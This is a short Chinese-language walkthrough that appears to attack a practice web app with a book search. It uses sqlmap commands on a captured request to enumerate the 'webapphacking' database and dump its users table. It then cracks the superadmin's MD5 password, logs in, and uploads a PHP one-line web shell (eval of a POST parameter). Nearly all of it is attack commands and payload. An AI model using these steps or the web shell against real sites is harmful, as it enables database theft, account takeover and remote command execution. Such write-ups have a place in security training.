步骤一,注册登录进去
步骤二,点击search
我们发现有很多书
步骤三,搜索一本书抓包发放到重放器
步骤四,数据改为1*,复制数据包到1.txt,然后打开sqlmap
步骤五,sqlmap查看当前数据库
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --current-db
步骤六,查表
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt -D webapphacking --tables
步骤七,查看users表的数据
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt -D webapphacking -T users --dump
步骤八,使用管理员账号登录
可以看到密码是被MD5加密的
在线MD5网站进行解密 可以看到密码是Uncrackable
账号superadmin 密码为Uncrackable 登录成功
步骤九,上传一句话木马
<?php @eval($_POST['cmd']); ?>
shell.php上传成功
我们看可以看到上传的shell.php文件